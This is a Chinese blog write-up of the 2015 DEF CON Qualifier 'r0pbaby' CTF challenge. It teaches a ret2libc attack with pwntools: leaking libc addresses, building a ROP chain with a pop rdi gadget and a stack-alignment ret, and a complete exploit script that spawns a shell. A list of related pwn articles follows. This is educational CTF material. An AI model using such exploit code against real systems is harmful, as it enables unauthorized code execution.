pwntools使用实践第三弹——ret2libc

最新推荐文章于 2024-11-26 08:00:00 发布
最新推荐文章于 2024-11-26 08:00:00 发布
阅读量529 收藏
点赞数
分类专栏: pwn linux CTF 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flurry_rain/article/details/120294736
版权

题目

2015-Defcon Qualifier R0pbaby
一个比较基础的rop链构造题目,题目链接如下:
https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/r0pbaby

题目分析

详细的分析可以参考这个博客:
DEFCON-2015-r0pbaby
大体步骤如下:

  1. 首先checksec检查程序开启了哪些防护:
    在这里插入图片描述
  2. objdump检查是否有可以直接使用的函数(system、execve等)来拿shell
objdump -S  r0pbaby

啥都没有。。。
3. ROPgadget检查是否有可用的/bin/sh字符串:

ROPgadget --binary r0pbaby --string="/bin/sh"

还是啥都没。。。
5. 运行程序,发现有四个选项:
在这里插入图片描述
选项1可以得到libc的地址,选项2可以得到任意一个libc中的符号的地址,选项3应该是存在溢出的攻击点,选项4为退出

  1. 思路为由选项2leak出system函数的地址,因为PIE不会改变最低12位的地址,也就是十六进制格式的最后三个数字是不会变的,因此可以通过对比libc中system符号的地址最后三位,找到使用的libc版本,使用libcSearch可以自动寻找,然后得到程序加载的基地址(选项2泄露的system地址-libc中system的偏移地址),进而可以得到/bin/sh字符串的地址(libc中有,使用基地址加上libc中的偏移地址即可)
  2. 获得system和/bin/sh字符串地址之后,需要找一个gadget,把/bin/sh字符串的地址从栈上pop到rdi寄存器里,因为x64的函数参数传递,前六个参数依次从rdi、rsi、rdx、rcx、r8、r9寄存器中获取,超过六个参数才会从栈上获取
  3. 分析溢出点,通过反编译程序代码,可以发现选项3实际上并不是一个溢出:
    在这里插入图片描述
    saveregs是IDA的关键字,保存的实际上是函数的栈帧指针RBP的地址,也就是说输出会直接覆盖掉RBP的地址,因此如果我们输入的字符串长度超过8字节,就会覆盖掉RBP上面的返回地址
  4. 综上我们的payload示例如下:
payload = b'a'*8(覆盖掉rbp,到达ret地址)+
pop_rdi(pop栈上数据到rdi寄存器)+
str_bin_addr(/bin/sh字符串地址)+
system_addr(system函数的地址)

ok,这样就可以写exp啦
真的可以了吗?

注意的坑!!!

如果直接使用上面给出的payload来写exp,有可能会遇到段错误:
在这里插入图片描述

使用gdb.attach()调试一下exp脚本,发现问题所在:
在这里插入图片描述
这个汇编的会检查当前栈内的值是否满足16字节对齐,而我们刚刚给出的payload,溢出了3*8=24字节内容:
pop_rdi+str_bin_addr+system_addr
因此我们需要再插入一个8字节内容来平衡栈
最简单的办法就是找一个ret的gadget放在pop_rdi之前:
在这里插入图片描述
最后我们得到的payload如下:

payload = b'a'*8(覆盖掉rbp,到达ret地址)+
ret_addr(平衡栈,保持16字节对齐)+
pop_rdi(pop栈上数据到rdi寄存器)+
str_bin_addr(/bin/sh字符串地址)+
system_addr(system函数的地址)

还有一点

因为程序开启了PIE,然后我们泄露的基地址是libc的,因此我们的gadget也要从libc中找

还有还有一点

注意合理使用pwntools的sendline和send,sendline默认会加上\n作为结尾。
程序会依次读取输入的所有字符,\n也会读入作为长度的一部分,也就是说如果我们设定字符长度为10,然后我们输入10个字符加回车确认,那么在读取完是个字符后,buf里还有一个回车符在,这样在下一轮选择中会直接识别到一个回车,会出现 Bad choise 错误:
在这里插入图片描述
其实通过逆向分析我们也能看出来,选项3存放字符串使用的buf跟存放选择1~4四个选项的buf是同一个,比如我们准备读取5个字符,但实际输入了6个,那么第6个字符会作为选项使用:
在这里插入图片描述

开始写exp:

ok,注意好上面的几点,我们就可以写exp了,完整的exp如下:

from pwn import *
p = process('./r0pbaby')
p.recvuntil(":")
p.recvuntil(":")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")
p.recvuntil(": ")
system_addr = int(p.recv(18), 16)

libc_base = system_addr - 0x4f550
bin_str_addr = libc_base + 0x1b3e1a
pop_rdi_addr = 0x215bf + libc_base
ret_addr = 0x8aa + libc_base
payload=b'a'*8 + p64(ret_addr) + p64(pop_rdi_addr) + p64(bin_str_addr) + p64(system_addr)
p.sendline("3")
p.recv("1024")
p.sendline(str(len(payload)))
p.sendline(payload)
p.interactive()

测试,完美:
在这里插入图片描述

pwntools加载指定版本libc
weixin_44164182的博客
07-12 3921
关于在Linux使用其他版本的libc执行二进制程序 1.查看本机libc版本 ldd --version 获取所需目标版本libc,可参考 https://github.com/niklasb/libc-database 2. libc文件和libc-dbg文件 libc.so文件为包含代码的、加载进目标进程地址空间的文件,一般发布时不带调试信息,直接使用这种so文件加载,在pwndbg中使用bin、heap等命令将提示无符号信息。 bins: This command only works w
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 758
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
pwn学习之ret2libc
weixin_43800829的博客
02-16 1442
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1245
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
pwntools安装
weixin_45653712的博客
06-07 489
下载pwntools时的一系列问题 下载pwntools时首先提示没有setuptools 下载setuptools又要用到pip 由于pip不支持python2.7,故要用 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py python get-pip.py.2 之后显示no such file or directory 按照如下博文步骤即可运行 https://blog.csdn.net/qq_15505637/article/details/81094
Linux pwn入门教程(10)——针对函数重定位流程的几种攻击
xiaoi123的博客
08-27 652
作者:Tangerine@SAINTSEC 本系列的最后一篇 感谢各位看客的支持 感谢原作者的付出 一直以来都有读者向笔者咨询教程系列问题,奈何该系列并非笔者所写[笔者仅为代发]且笔者功底薄弱,故无法解答,望见谅 如有关于该系列教程的疑问建议联系论坛的原作者ID:Tangerine 0x00 got表、plt表与延迟绑定 在之前的章节中,我们无数次提到过got表和plt表这两个结构。这两...
缓冲区溢出 - ROP 基础
weixin_46099552的博客
10-28 1043
ROP基础
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1547
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
PWN基础知识及基础栈溢出手法
山高路远
04-12 4283
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 6136
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
Pwntools安装
luminous_you的博客
11-01 9657
Python3 $ apt-get update $ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential $ python3 -m pip install --upgrade pip $ python3 -m pip install --upgrade pwntools 注意:Pwntools 维护者强烈建议在未来所有基于 Pwntools 的脚本和项目中使用 Python3。
Pwntools的安装
c0071的博客
03-20 1133
安装了pip: sudo apt-get update sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential sudo pip install --upgrade pip sudo pip install --upgrade pwntools
CTF pwn中利用pwntools加载不同版本libc调试程序的方法
Assassin
04-09 5279
在网上找到了很多加载libc的帖子,终于自己走通了一次,现在把方法和资源都整理一下 一、解决方案 python利用pwntools的代码 from pwn import * import pwnlib context(os='linux',arch='amd64',log_level='debug') if __name__ == '__main__': conn = process(['./ld-2.23.so','./pwn'], env = {'LD_PRELOAD' : './libc-2.2
安装pwntools
最新发布
2201_75556700的博客
11-26 415
2、开启安装,在pycharm终端安装即可,使用pip install pwntools命令。1、在一次需要用到pwntools这个库的时候,发现没有。3、太难了,终于下完了,一定要保证网络。
PWN:pwntools的安装
m0_53932372的博客
07-01 2525
pwntools sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential (安装pip3) pip3 -v (查看版本) pip换源 在根目录下创建文件夹: .pip 在.pip里创建文件: pip.conf 自行安装vim sudo apt vim 使用vim libcsearch pwndbg peda gef ......
PWN基础工具安装
qq_60737948的博客
10-04 529
工欲善其事必先利其器,pwn基础工具的安装
Kali安装pwntools
fr4granc3
01-20 6701
安装 capstone git clone https://github.com/aquynh/capstone cd capstone make make install 安装pwntools 如果安装过程中下载资源时非常卡,需要换kali更新源,然后apt-get update。 git clone https://github.com/Gallopsled/pwntools cd pwnt...
pwntools的安装及基本使用
热门推荐
、moddemod
02-28 2万+
安装 sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential -y python3 -m pip install --upgrade pip pip3 install --upgrade pwntools pwntools使用 基本模块 asm 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有主流平台 dynelf 用
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值